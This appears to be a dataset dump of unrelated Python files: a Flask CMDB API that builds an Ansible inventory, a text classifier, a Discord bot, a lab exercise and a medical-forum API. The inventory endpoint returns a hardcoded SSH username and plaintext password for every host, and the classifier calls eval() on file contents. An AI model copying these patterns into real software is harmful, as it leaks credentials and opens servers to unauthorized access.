\"children\": []})\n record = [\"id\", \"machine_name\", \"in_ip\", \"modules_use\", \"owner\"]\n parmas = {\"project_id\": project_id}\n machines = ops_machine.select(record=record, params=parmas)\n # print project_id,machines #每个项目ID对应主机\n if machines:\n for machine_id, machine_name, in_ip, modules_use, owner in machines:\n # 主机级\n # 生成主机标签\n text = \"\\\n {1}({0})\\t\".format(owner,\n in_ip,\n machine_id, )\n if modules_use:\n for ser in modules_use.split(\",\"):\n text += \"{0}\".format(ser)\n\n data[cindex][\"children\"][bindex][\"children\"][pindex][\"children\"].append(\n {\"icon\": \"jstree-file\", \"text\": text})\n\n\n@b_service_tree.route('/api/st_get_tree') #API获取公司名下的业务\n@p.is_login\ndef api_st_get_tree():\n # /api/st_get_projects?business_id=4\n result = {\n 'code' : 0,\n 'message' : \"success\",\n 'core' : {\n\t\t\t'data' : [\n\t\t\t\t{\n\t\t\t\t\t\"text\" : \"国美\",\n\t\t\t\t\t\"state\" : { \"opened\" : True },\n\t\t\t\t\t\"children\" : [\n\t\t\t\t\t\t# {\n\t\t\t\t\t\t# \t\"text\" : \"Child node 1\",\n\t\t\t\t\t\t# \t\"state\" : { \"selected\" : true },\n\t\t\t\t\t\t# \t\"icon\" : \"jstree-file\"\n\t\t\t\t\t\t# },\n\t\t\t\t\t\t# { \"text\" : \"Child node 2\", \"state\" : { \"disabled\" : true } }\n\t\t\t\t\t]\n\t\t\t\t},\n\n {\n \"text\": \"其它\",\n \"state\": {\"opened\": True},\n \"children\": [\n # {\n # \t\"text\" : \"Child node 1\",\n # \t\"state\" : { \"selected\" : true },\n # \t\"icon\" : \"jstree-file\"\n # },\n # { \"text\" : \"Child node 2\", \"state\" : { \"disabled\" : true } }\n ]\n }\n\t\t\t]\n\t\t}\n }\n # {公司[{业务}[{项目}]]}\n\n ops_sub_company = cmdb.OpsSubCompany()\n ops_business = cmdb.OpsBusiness()\n ops_project = cmdb.OpsProject()\n ops_machine = cmdb.OpsMachineInfo()\n\n record = [\"id\",\"name\",\"has_server\"]\n companys = ops_sub_company.select(record=record)\n # print(len(companys),companys) # 12个\n data_gome = result[\"core\"][\"data\"][0][\"children\"] # 国美\n data_other = result[\"core\"][\"data\"][1][\"children\"] # 其它\n\n for cindex,(company_id, company_name,has_server) in enumerate(companys):\n\n if not has_server: # 如果公司不是\"国美\"\n # 添加到国美\n data_gome.append({\"text\":company_name, \"children\":[]})\n # 添加业务线到公司\n make_bussiness_tree(data_gome, cindex, company_id, ops_business, ops_project, ops_machine)\n # 添加到其它\n data_other.append({\"text\": company_name, \"children\": []})\n #make_bussiness_tree(data_other, cindex, company_id, ops_business, ops_project, ops_machine)\n\n else: # 如果公司是\"国美\"\n # 添加到国美\n data_gome.append({\"text\":company_name, \"children\":[]})\n # 添加业务线到公司\n make_bussiness_tree(data_gome, cindex, company_id, ops_business, ops_project, ops_machine)\n # 去掉\"国美\"中重复添加的公司\n result[\"core\"][\"data\"][0][\"children\"] = [i for i in data_gome if i not in data_other]\n\n result2 = copy.deepcopy(result)\n data = result2[\"core\"][\"data\"]\n\n # 转换成功则返回新数据,否则返回老数据。\n if make_text(data):\n result = result2\n\n resp = make_response(jsonify(result))\n resp.headers[\"Access-Control-Allow-Origin\"] = \"*\"\n return resp\n\n\ndef make_text(data):\n try:\n for d in data:\n if d.has_key(\"children\") and len(d.get(\"children\", None)):\n d[\"text\"] = '''{name}{num}'''.format(name=d[\"text\"], num=len(d[\"children\"]))\n make_text(d[\"children\"])\n return True\n except:\n return False\n\n@b_service_tree.route('/api/ansible/trees') #API获取公司名下的业务\ndef api_ansible_trees():\n '''通过星云服务树获取相应的ansible Inventory信息'''\n\n token = request.values.get(\"token\", \"\")\n if not token:\n return jsonify({\"code\":1, \"message\":\"Not Fund Token.\"})\n\n if 
token != conf.ANSIBLE_TOKEN:\n return jsonify({\"code\":1, \"message\":\"Token Fail.\"})\n\n # Init Class\n ops_machine = cmdb.OpsMachineInfo()\n\n company = request.values.get(\"company\", \"\")\n business = request.values.get(\"business\", \"\")\n project = request.values.get(\"project\", \"\")\n\n company_id = request.values.get(\"company_id\", \"\")\n business_id = request.values.get(\"business_id\", \"\")\n project_id = request.values.get(\"project_id\", \"\")\n\n if company: # 返回公司下所有\n if business: # 返回业务下所有\n if project: # 返回项目下所有\n data = ops_machine.select_rows_api(company_name=company,\n business_name=business,\n project_name=project)\n else:\n data = ops_machine.select_rows_api(company_name=company,\n business_name=business)\n else:\n data = ops_machine.select_rows_api(company_name=company)\n\n elif company_id: # 返回公司下所有\n if business_id: # 返回业务下所有\n if project_id: # 返回项目下所有\n data = ops_machine.select_rows_api(company_id=company_id,\n business_id=business_id,\n project_id=project_id)\n else:\n data = ops_machine.select_rows_api(company_id=company_id,\n business_id=business_id)\n else:\n data = ops_machine.select_rows_api(company_id=company_id)\n\n else:\n data = ops_machine.select_rows_api()\n\n result = {\n \"_meta\": {\n \"hostvars\": {}\n }\n }\n # {\n # \"databases\": {\n # \"hosts\": [\"host1.example.com\", \"host2.example.com\"],\n # \"vars\": {\n # \"a\": true\n # }\n # },\n # \"webservers\": [\"host2.example.com\", \"host3.example.com\"],\n # \"atlanta\": {\n # \"hosts\": [\"host1.example.com\", \"host4.example.com\", \"host5.example.com\"],\n # \"vars\": {\n # \"b\": false\n # },\n # \"children\": [\"marietta\", \"5points\"]\n # },\n # \"marietta\": [\"host6.example.com\"],\n # \"5points\": [\"host7.example.com\"]\n # }\n\n # 按照Ansible格式输出\n for project_name, project_id, company_name, company_id, \\\n business_name, business_id, ip, machine_name in data:\n ckey = 'c={0}'.format(company_name)\n bkey = 'b={0}={1}'.format(company_name, business_name)\n pkey = 'p={0}={1}={2}'.format(company_name, business_name, project_name)\n\n if ckey not in result: # init company_name\n result[ckey] = {\n \"vars\" : {\n \"company_name\" : company_name,\n \"company_id\" : company_id\n },\n \"children\" : [bkey, ]\n }\n else:\n if bkey not in result[ckey][\"children\"]:\n result[ckey][\"children\"].append(bkey)\n\n if bkey not in result:\n result[bkey] = {\n \"vars\": {\n \"parent_name\" : \"{0}\".format(company_name),\n \"parent_id\" : \"{0}\".format(company_id),\n\n },\n \"children\": [pkey, ]\n }\n else:\n if pkey not in result[bkey][\"children\"]:\n result[bkey][\"children\"].append(pkey)\n\n if pkey not in result:\n result[pkey] = {\n \"vars\": {\n \"parent_name\" : \"{0};{1}\".format(company_name, business_name),\n \"parent_id\" : \"{0};{1}\".format(company_id, business_id),\n },\n \"hosts\" : [ip, ]\n }\n else:\n result[pkey][\"hosts\"].append(ip)\n\n # 更新每个主机的变量,让其客户端缓存不调用--host来触发多个远程调用。\n result[\"_meta\"][\"hostvars\"][ip] = {\n \"ansible_host\": ip,\n \"ansible_port\": 22,\n \"ansible_ssh_pass\": \"windows2003\",\n \"ansible_user\": \"zuowenhong\",\n \"hostname\" : machine_name,\n \"company\" : company_name,\n \"business\" : business_name,\n \"project\" : project_name,\n \"company_id\" : company_id,\n \"business_id\" : business_id,\n \"project_id\" : project_id\n }\n\n return 
jsonify(result)\n","sub_path":"controllers/service_tree.py","file_name":"service_tree.py","file_ext":"py","file_size_in_byte":34121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"248001965","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 6 23:07:03 2020\n\n@author: Administrator\n\"\"\"\n\nfrom fastapi import FastAPI\nimport os\nimport jieba\nimport re\nimport numpy as np\nfrom sklearn.externals import joblib\nimport gensim\nfrom keras.models import load_model\nfrom keras.preprocessing import sequence\n\napp = FastAPI()\n\n\nwork_path = 'D:/2020年工作/2020年工单智能化项目/'\nos.chdir(work_path)\n\n# 载入tokenizer模型\ntoken = joblib.load('./token_file.pkl')\n\n# 载入分类字典\nwith open('./label_dict.txt', 'r') as f:\n label_dict = eval(f.read())\n\n# 读取模型\nmodel = load_model('./lstm_model_10_epochs_maxlen127.h5')\n\n#定义读取停词表的函数\ndef loadStopWords():\n stop = []\n for line in open('stopWord.txt').readlines():\n stop.append(line)\n return list(set(stop))\n\n\n#定义切词函数\ndef cutWords(msg,stopWords):\n jieba.load_userdict(\"userdict.txt\")\n arr_leftWords=[]\n seg_list = jieba.cut(msg,cut_all=False)\n leftWords=''\n for i in seg_list:#for i in y,y可以是列表、元组、字典、Series\n if (i not in stopWords):\n leftWords+=' '+i\n leftWords.strip()\n arr_leftWords.append(leftWords)\n return arr_leftWords\n\ndef replace_spcial(msg):\n msg = msg.replace('
\r\n','')\n msg = msg.replace('','')\n msg = msg.replace('','')\n msg = msg.replace('->','')\n return msg\n\ndef pred_class(msg):\n msg = msg.translate(symbol_map)\n msg = replace_spcial(msg)\n msg = re.sub('\d','',msg)\n\n stopWords = loadStopWords()\n X_cut = cutWords(msg,stopWords) # word segmentation\n xtest_seq = token.texts_to_sequences(X_cut)\n\n max_len = 127\n xtest_pad = sequence.pad_sequences(xtest_seq, maxlen=max_len)\n\n # predict\n y_pred_prob = model.predict(xtest_pad, verbose=0)[0]\n y_pred_list = y_pred_prob.tolist()\n y_pred_class = y_pred_list.index(max(y_pred_list))\n return y_pred_class\n\n\nsymbol_map = {\n ord('\\n') : None,\n ord('\\t') : None,\n ord('\\r') : None,\n ord('①') : None,\n ord('②') : None,\n ord('③') : None,\n ord('④') : None,\n ord('【') : None,\n ord('】') : None,\n ord('(') : None,\n ord(')') : None,\n ord('(') : None,\n ord(')') : None,\n ord(':') : None,\n ord(':') : None,\n ord('-') : None,\n ord(';') : None,\n ord(';') : None,\n ord(',') : None,\n ord(',') : None,\n ord('。') : None,\n ord('.') : None,\n ord('、') : None,\n ord('-') : None,\n ord('—') : None,\n ord('/') : None,\n}\n\n\nmsg1 = '''\n1.投诉原因:用户因携号转网用户无法正常使用 引发用户投诉\n2.核实情况:查HLR数据正常,查询AN-AAA正常、AAA正常\n3.处理结果:查看移动未反馈,我方已催促移动处理。\n4.回复用户情况:(录音流水号1901050000179166)12132回复用户认可、无异议\n5. 说明备注:;\r\n\r\n\r\n回访信息\r\n总体情况:满意; 处理态度:满意; 处理及时性:满意; 处理结果:满意;\r\n\r\n结果说明\r\n问题产生原因:;\r\n\r\n采取措施:;\r\n\r\n原因分类:移动业务->终端及卡->用户端原因->用户自备设备或终端问题;\r\n\r\n处理结果\r\n责任定性:企业原因;\r\n\r\n考核原因:;\r\n\r\n责任部门:市场部【64】;\r\n\r\nCRM流水号(操作):99999999999999;\r\n\r\n备注:\n'''\nmsg1_class = 72\n\nmsg2 = '''\n①投诉原因:因有信号无法正常使用引发用户的投诉\n②核实情况:根据用户诉求查询AN-AAA正常、AAA正常,HLR状态正常\n③处理结果:投诉原因:市电停电,富宁里达共移动基站目前已经恢复正常,联系用户,用户不在投诉区域,建议用户返还投诉区域后使用观察,用户表示认可\n④回复用户情况:(录音流水号 1901050000212832 )12947回复用户认可、无异议\n⑤说明备注:无;\r\n\r\n\r\n回访信息\r\n总体情况:满意; 处理态度:满意; 处理及时性:满意; 处理结果:满意;\r\n\r\n结果说明\r\n问题产生原因:;\r\n\r\n采取措施:;\r\n\r\n原因分类:移动业务->移动语音网络->无线网络原因->基站故障->基站设备故障;\r\n\r\n处理结果\r\n责任定性:企业原因;\r\n\r\n考核原因:;\r\n\r\n责任部门:文山分公司【876】;\r\n\r\nCRM流水号(操作):99999999999999;\r\n\r\n备注:\n'''\nmsg2_class = 23\n\n\nmsg3 = '''\n1.投诉原因:用户因网速慢 引发用户投诉\n2.核实情况:查HLR数据正常,查询AN-AAA正常、AAA正常\n3.处理结果:经核实,分公司投诉处理员16613联系用户核实使用情况,男机主本人接听 ,用户反映在腾冲天诚商业街使用,有4G网络,但网速慢,离开该区域未好转,经网络部核实该区域基站信号正常。投诉处理员16613联系用户解释,请用至营业厅检查终端或更换UIM卡,用户对处理结果认可。\n4.回复用户情况:(录音流水号1901040000416164 )分公司已经联系用户解释\n5. 说明备注:;\r\n\r\n\r\n回访信息\r\n总体情况:满意; 处理态度:满意; 处理及时性:满意; 处理结果:满意;\r\n\r\n结果说明\r\n问题产生原因:;\r\n\r\n采取措施:;\r\n\r\n原因分类:移动业务->终端及卡->用户端原因->用户自备设备或终端问题;\r\n\r\n处理结果\r\n责任定性:用户原因;\r\n\r\n考核原因:;\r\n\r\n责任部门:;\r\n\r\nCRM流水号(操作):99999999999999;\r\n\r\n备注:经核实,分公司投诉处理员16613联系用户核实使用情况,男机主本人接听 ,用户反映在腾冲天诚商业街使用,有4G网络,但网速慢,离开该区域未好转,经网络部核实该区域基站信号正常。投诉处理员16613联系用户解释,请用至营业厅检查终端或更换UIM卡,用户对处理结果认可\n'''\nmsg3_class = 54\n\n\n\n@app.get(\"/classify\")\nasync def read_msg(content: str, clas:int = None):\n y_pred = pred_class(content)\n class_text = label_dict.get(y_pred)\n return {\"pred\": y_pred, \"text\": class_text, \"class\": clas}\n","sub_path":"fast_api/fast_api_text_classify.py","file_name":"fast_api_text_classify.py","file_ext":"py","file_size_in_byte":6384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"264129584","text":"def minmp(filename, compound_formula):\n \"\"\"(str, str) -> (str, int)\n When passed a filename with a listing of elements and properties and a compound_formula. Returns a tuple where the first element is the lowest melting point element in the compound and the second element is its corresponding melting point.\n >>>minmp(\"elements.txt\", \"K1Fe4\")\n 'K', 336\n >>>minmp(\"elements.txt\", \"Fe6Cr1\")\n 'Fe', 1811\n \"\"\"\n #open the file, take out the content, and close the handle\n myfile = open(filename,'r')\n content = myfile.read()\n myfile.close()\n elements = []\n Melting_point= []\n dictionary_with_melt={}\n for i in range(len(content)):\n if content[i-1] == '\\n' :\n for tab in range(3):\n if content[i+tab] == '\\t' :\n elements.append(content[i:i+tab])\n if content[i-1] == '\\t' :\n for sec_tab in range(5):\n if content[i+sec_tab] == '\\t' :\n Melting_point.append(int(content[i:i+sec_tab])) \n for e in range(len(elements)):\n dictionary_with_melt[elements[e]] = Melting_point[e]\n \n input_compound = list(molform(compound_formula).keys())\n result = []\n result_melt_point=[]\n for test_element in input_compound:\n if test_element in dictionary_with_melt:\n result.append(test_element)\n result_melt_point.append(dictionary_with_melt[test_element])\n if test_element not in dictionary_with_melt:\n continue\n for num in range(len(result)):\n if result_melt_point[num] == min(result_melt_point):\n return result[num],result_melt_point[num]\n #for i in range(len(content)):\n #if content[i] = '/n':\n #print('hi')\n \n #transfer the content into a dictionary\n \n #find the elements involved\n #compare the different melting point\n \n \ndef molform(compound_formula):\n \"\"\"(str) -> dictionary\n When passed a string of the compound formula, returns a dictionary with a string of the element symbol as the key and the number of atoms of that element as the value.\n >>>molform(\"C2H6O1\")\n {'C':2, 'H':6, 'O':1}\n >>>molform(\"C1H4\")\n {'C':1, 'H':4}\n \"\"\"\n dictionary= {}\n elements = []\n digits = []\n for i in range(len(compound_formula)-1):\n if compound_formula[i].isalpha():\n \n element = ''\n \n element += compound_formula[i]\n \n if compound_formula[i+1].isalpha():\n \n element += compound_formula[i+1]\n elements.append(element) \n \n if compound_formula[i].isdigit():\n if not (compound_formula[i-1].isdigit()) and not (compound_formula[i+1].isdigit()):\n digit = ''\n digit += compound_formula[i]\n digits.append(int(digit))\n if compound_formula[i+1].isdigit():\n digit = compound_formula[i]\n digit += compound_formula[i+1]\n digits.append(int(digit))\n if compound_formula[-1].isdigit():\n digits.append(int(compound_formula[-1]))\n elements1 = tuple(elements)\n for e in range(len(elements1)-1):\n for element in (elements1[:e]+elements1[e+1:]):\n if element.isupper():\n continue\n if element in elements1[e]:\n if not element in elements:\n break\n elements.remove(element)\n for j in 
range(len(elements)):\n dictionary[elements[j]]= digits[j]\n \n return dictionary\n \n ","sub_path":"lab6.py","file_name":"lab6.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"508479594","text":"# Copyright (c) 2016-present, Facebook, Inc.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport unittest\nfrom unittest.mock import MagicMock, patch\n\nfrom ... import commands\nfrom ...analysis_directory import AnalysisDirectory\nfrom ...json_rpc import read_response\nfrom ...socket_connection import SocketConnection\nfrom .command_test import mock_arguments, mock_configuration\n\n\nclass QueryTest(unittest.TestCase):\n def test_query(self) -> None:\n original_directory = \"/original/directory\"\n arguments = mock_arguments()\n arguments.query = \"\"\n configuration = mock_configuration()\n\n with patch.object(SocketConnection, \"connect\") as connect:\n result = MagicMock()\n result.output = \"{}\"\n read_response.return_value = result\n\n commands.Query(\n arguments, original_directory, configuration, AnalysisDirectory(\".\")\n ).run()\n connect.assert_called_once()\n\n arguments.log_directory = \"/tmp/foo\"\n arguments.query = \"query\"\n self.assertEqual(\n commands.Query(\n arguments, original_directory, configuration, AnalysisDirectory(\".\")\n )._flags(),\n [\"query\", \"-log-directory\", \"/tmp/foo\"],\n )\n\n def test_rewrite_paths(self) -> None:\n original_directory = \"/original/directory\"\n arguments = mock_arguments()\n configuration = mock_configuration()\n analysis_directory = MagicMock()\n arguments.query = \"\"\n analysis_directory.compute_symbolic_links.return_value = {\n \"/root/a.py\": \"/shared/a.py\",\n \"/root/b.py\": \"/shared/b.py\",\n }\n query = commands.Query(\n arguments, original_directory, configuration, analysis_directory\n )\n self.assertEqual(\n query._rewrite_paths(\"run_check('awaitable', '/root/a.py')\"),\n \"run_check('awaitable', '/shared/a.py')\",\n )\n self.assertEqual(\n query._rewrite_paths(\"run_check('awaitable', '/root/b.py')\"),\n \"run_check('awaitable', '/shared/b.py')\",\n )\n self.assertEqual(\n query._rewrite_paths(\"run_check('awaitable', 'other/root/b.py')\"),\n \"run_check('awaitable', 'other/root/b.py')\",\n )\n self.assertEqual(\n query._rewrite_paths(\"run_check('awaitable', '/root/b.py/suffix')\"),\n \"run_check('awaitable', '/root/b.py/suffix')\",\n )\n # We don't parse anything when rewriting paths.\n self.assertEqual(\n query._rewrite_paths(\"'/root/b.py'run_check('awaitable', '/root/a.py')\"),\n \"'/shared/b.py'run_check('awaitable', '/shared/a.py')\",\n )\n","sub_path":"client/commands/tests/query_test.py","file_name":"query_test.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"59938867","text":"import sys\nimport copy\n\nimport discord\nimport asyncio\n\nimport importlib\n\nimport message_handler as mh\n\n\nclient = discord.Client()\n\n\ntry:\n\timport json\n\n\twith open(\"config.json\") as config:\n\t\t\tconfig = json.load(config)\n\n\ttoken \t\t\t\t= config['token']\n\tbotname\t\t\t\t= config['botname']\n\tplaygame\t\t\t= config['playgame']\n\n\tbot_prefixes \t\t= config['bot_prefixes']\n\tbot_short_commands \t= config['bot_short_commands']\n\topt_commands \t\t= config['opt_commands']\n\n\t_globals = 
mh.getGlobals()\n\t_globals.update(globals())\n\n\t#switch-case\n\t#keys - startwith of message\n\t#values - functions from message_handler.py\n\tswitcher = {}\n\tfor key, value in config['switcher'].items():\n\t\tswitcher[key] = _globals[value]\n\n\nexcept:\n\tprint(\"Config file not found!\")\n\tsys.exit()\n\n\n\n@client.event\nasync def on_ready():\n\tprint(\"{} is ready!\".format(botname))\n\tprint(\"Name: {}\".format(client.user.name))\n\tprint(\"ID: {}\".format(client.user.id))\n\tprint(\"---------------------------------\")\n\n\tawait client.change_presence(game = discord.Game(name = playgame))\n\n\n@client.event\nasync def on_message(message):\n\t\n\tprint('\\n')\n\tprint('Message info:')\n\tprint('---------------------------------')\n\tprint('author: {}'.format(message.author))\n\tprint('id: {}'.format(message.author.id))\n\tprint('server: {}'.format(message.server))\n\tprint('channel: {}'.format(message.channel))\n\tprint('content: {}'.format(message.content))\n\n\ttry:\n\t\tind = 1\n\t\tfor emb in message.embeds:\n\t\t\tprint('emb{} description: {}'.format(ind, emb['description']))\t\n\texcept:\n\t\tpass\n\t\n\tprint('---------------------------------')\n\tprint('\\n')\n\n\t#bot found the commands in message\n\tif any(message.content.lower().startswith(prefix) for prefix in bot_prefixes):\n\t\tawait start_handler(message)\n\tif any(message.content.lower().startswith(cmd) for cmd in bot_short_commands):\n\t\tawait start_handler(message, short = True)\n\t\n\n#Start message_handler\nasync def start_handler(message, short = False):\n\n\t#Calling func from switcher\n\n\t#using command with bot_prefix\n\tif short == False:\n\t\tmess_startwith = message.content.lower().split()\n\t\tif len(mess_startwith) > 1 and mess_startwith[1] in switcher:\n\t\t\tmessage_without_cmd = del_cmd_from_message_content(message, short)\n\t\t\tawait switcher[mess_startwith[1]](client, message_without_cmd)\n\t\t\t\n\t#using short command without bot_prefix\n\tif short == True:\n\t\tmess_startwith = message.content.lower().split()\n\t\tif len(mess_startwith) > 0 and mess_startwith[0] in switcher:\n\t\t\tmessage_without_cmd = del_cmd_from_message_content(message, short)\n\t\t\t\n\t\t\t\n\t\t\t#Call funcs with Special Arguments\n\n\t\t\t#mh.quote_multiline\n\t\t\tif switcher[mess_startwith[0]] == mh.quote_multiline:\n\t\t\t\tawait switcher[mess_startwith[0]](client, message_without_cmd, opt_commands)\t\n\t\t\t\treturn\n\t\t\t\n\t\t\t#else\n\t\t\tawait switcher[mess_startwith[0]](client, message_without_cmd)\n\n\n#Delete in message.content command and return message without one\ndef del_cmd_from_message_content(message, short = True):\n\n\tlines = message.content.split('\\n')\n\t\n\tif short == False:\n\t\tlines[0] = \" \".join(lines[0].split()[2:])\n\tif short == True:\n\t\tlines[0] = \" \".join(lines[0].split()[1:])\n\t\n\tcontent = \"\\n\".join(lines)\n\n\tmessage.content = content\n\t#print('content: {}'.format(content))\n\n\treturn message\n\t\n\nclient.run(token)\n\n","sub_path":"botstart.py","file_name":"botstart.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"554229183","text":"expr=str(input('Digite a expressao:'))\npilha=[]\nfor simb in expr:\n if simb=='(':\n pilha.append('(')\n elif simb==')':\n if len(pilha)>0:\n pilha.pop()\n else:\n pilha.append(')')\n break\n \nif len(pilha)==0:\n print('Sua expressão está correta')\nelse:\n print('Sua expressão não está correta')\n 
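\n# The same stack scan wrapped as a reusable predicate, added here as an\n# illustrative sketch (only the interactive script above is the original):\ndef esta_balanceada(expr):\n pilha = []\n for simb in expr:\n if simb == '(':\n pilha.append(simb)\n elif simb == ')':\n if len(pilha) > 0:\n pilha.pop()\n else:\n return False\n return len(pilha) == 0\n# esta_balanceada('(())') -> True; esta_balanceada(')(') -> False\n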
","sub_path":"Python/LT/validandoexpressoes.py","file_name":"validandoexpressoes.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"68327065","text":"\"\"\"\r\nDiagnosis and Diagnoses resource API implementation\r\n\"\"\"\r\n\r\nimport json\r\nfrom flask import request, Response, g\r\nfrom flask_restful import Resource, abort\r\nfrom .resources import API, hyper_const\r\nfrom . import forum_object as forum_obj\r\nfrom .error_handlers import create_error_response\r\nfrom . import user_resources as user_res\r\n\r\n\r\nclass Diagnoses(Resource):\r\n \"\"\"\r\n Resource Diagnoses implementation\r\n \"\"\"\r\n\r\n def get(self):\r\n \"\"\"\r\n Get all diagnoses.\r\n\r\n INPUT parameters:\r\n None\r\n\r\n RESPONSE ENTITY BODY:\r\n * Media type: Mason\r\n https://github.com/JornWildt/Mason\r\n * Profile: Forum_Diagnosis\r\n /profiles/diagnosis_profile\r\n\r\n NOTE:\r\n * The attribute disease is obtained from the column diagnoses.disease\r\n * The attribute diagnosis is obtained from the column diagnoses.diagnosis_description\r\n * The attribute message_id is obtained from the column diagnoses.message_id\r\n * The attribute user_id is obtained from the column diagnoses.user_id\r\n \"\"\"\r\n\r\n diagnoses_db = g.con.get_diagnoses()\r\n\r\n envelope = forum_obj.ForumObject()\r\n envelope.add_namespace(\"medical_forum\", hyper_const.LINK_RELATIONS_URL)\r\n\r\n envelope.add_control(\"self\", href=API.url_for(Diagnoses))\r\n envelope.add_control_users_all()\r\n envelope.add_control_add_diagnosis()\r\n items = envelope[\"items\"] = []\r\n\r\n for dgs in diagnoses_db:\r\n item = forum_obj.ForumObject(\r\n id=dgs[\"diagnosis_id\"], disease=dgs[\"disease\"])\r\n item.add_control(\"self\", href=API.url_for(\r\n Diagnosis, diagnosis_id=dgs[\"diagnosis_id\"]))\r\n item.add_control(\r\n \"profile\", href=hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n items.append(item)\r\n\r\n return Response(json.dumps(envelope), 200, mimetype=hyper_const.MASON + \";\" +\r\n hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n\r\n def post(self):\r\n \"\"\"\r\n Adds a a new diagnosis.\r\n\r\n REQUEST ENTITY BODY:\r\n * Media type: JSON:\r\n * Profile: Forum_Diagnosis\r\n /profiles/diagnosis_profile\r\n\r\n NOTE:\r\n * The attribute disease is obtained from the column diagnoses.disease\r\n * The attribute diagnosis_description is obtained from the column\r\n * diagnoses.diagnosis_description\r\n * The attribute message_id is obtained from the column diagnoses.message_id\r\n * The attribute user_id is obtained from the column diagnoses.user_id\r\n\r\n The body should be a JSON document that matches the schema for new diagnoses\r\n\r\n RESPONSE STATUS CODE:\r\n * Returns 201 if the diagnosis has been added correctly.\r\n The Location header contains the path of the new diagnosis\r\n * Returns 400 if the diagnosis is not well formed or the entity body is\r\n empty.\r\n * Returns 415 if the format of the response is not json\r\n * Returns 500 if the diagnosis could not be added to database.\r\n\r\n \"\"\"\r\n\r\n # Extract the request body. In general would be request.data\r\n # Since the request is JSON I use request.get_json\r\n # get_json returns a python dictionary after serializing the request body\r\n # get_json returns None if the body of the request is not formatted\r\n # using JSON. 
We use force=True since the input media type is not\r\n # application/json.\r\n\r\n if hyper_const.JSON != request.headers.get(\"Content-Type\", \"\"):\r\n return create_error_response(\r\n 415, \"UnsupportedMediaType\", \"Use a JSON compatible format\")\r\n request_body = request.get_json(force=True)\r\n\r\n try:\r\n disease = request_body[\"disease\"]\r\n diagnosis_description = request_body[\"diagnosis_description\"]\r\n message_id = request_body.get(\"message_id\")\r\n user_id = request_body.get(\"user_id\")\r\n\r\n except KeyError:\r\n return create_error_response(\r\n 400, \"Wrong request format\",\r\n \"Be sure you include diagnosis and disease and a valid user_id\")\r\n\r\n user_id = int(user_id)\r\n message_id = 'msg-' + message_id\r\n diagnosis = {'user_id': user_id,\r\n 'message_id': message_id,\r\n 'disease': disease,\r\n 'diagnosis_description': diagnosis_description}\r\n try:\r\n new_diagnosis_id = g.con.create_diagnosis(diagnosis)\r\n except ValueError:\r\n return create_error_response(\r\n 400, \"Request by non-doctor user\", \"Only doctors can add a diagnosis\")\r\n\r\n if not new_diagnosis_id:\r\n return create_error_response(\r\n 500, \"Problem with the database\", \"Cannot access the database\")\r\n\r\n url = API.url_for(Diagnosis, diagnosis_id=new_diagnosis_id)\r\n return Response(status=201, headers={\"Location\": url})\r\n\r\n\r\nclass DiagnosesHistory(Resource):\r\n \"\"\"\r\n Resource Diagnoses implementation\r\n \"\"\"\r\n\r\n def get(self, user_id=None):\r\n \"\"\"\r\n Get all diagnoses.\r\n\r\n INPUT parameters:\r\n None\r\n\r\n RESPONSE ENTITY BODY:\r\n * Media type: Mason\r\n https://github.com/JornWildt/Mason\r\n * Profile: Forum_Diagnosis\r\n /profiles/diagnosis_profile\r\n\r\n NOTE:\r\n * The attribute disease is obtained from the column diagnoses.disease\r\n * The attribute diagnosis is obtained from the column diagnoses.diagnosis_description\r\n * The attribute message_id is obtained from the column diagnoses.message_id\r\n * The attribute user_id is obtained from the column diagnoses.user_id\r\n \"\"\"\r\n\r\n diagnoses_db = g.con.get_diagnoses(user_id=user_id)\r\n envelope = forum_obj.ForumObject()\r\n envelope.add_namespace(\"medical_forum\", hyper_const.LINK_RELATIONS_URL)\r\n\r\n envelope.add_control(\"self\", href=API.url_for(Diagnoses))\r\n envelope.add_control_users_all()\r\n envelope.add_control_add_diagnosis()\r\n items = envelope[\"items\"] = []\r\n\r\n for dgs in diagnoses_db:\r\n item = forum_obj.ForumObject(\r\n id=dgs[\"diagnosis_id\"], disease=dgs[\"disease\"])\r\n item.add_control(\"self\", href=API.url_for(\r\n Diagnosis, diagnosis_id=dgs[\"diagnosis_id\"]))\r\n item.add_control(\r\n \"profile\", href=hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n items.append(item)\r\n\r\n return Response(json.dumps(envelope), 200, mimetype=hyper_const.MASON + \";\" +\r\n hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n\r\n\r\nclass DiagnosesHistoryMessage(Resource):\r\n \"\"\"\r\n Resource Diagnoses implementation\r\n \"\"\"\r\n\r\n def get(self, message_id=None):\r\n \"\"\"\r\n Get all diagnoses.\r\n\r\n INPUT parameters:\r\n None\r\n\r\n RESPONSE ENTITY BODY:\r\n * Media type: Mason\r\n https://github.com/JornWildt/Mason\r\n * Profile: Forum_Diagnosis\r\n /profiles/diagnosis_profile\r\n\r\n NOTE:\r\n * The attribute disease is obtained from the column diagnoses.disease\r\n * The attribute diagnosis is obtained from the column diagnoses.diagnosis_description\r\n * The attribute message_id is obtained from the column diagnoses.message_id\r\n * The attribute user_id 
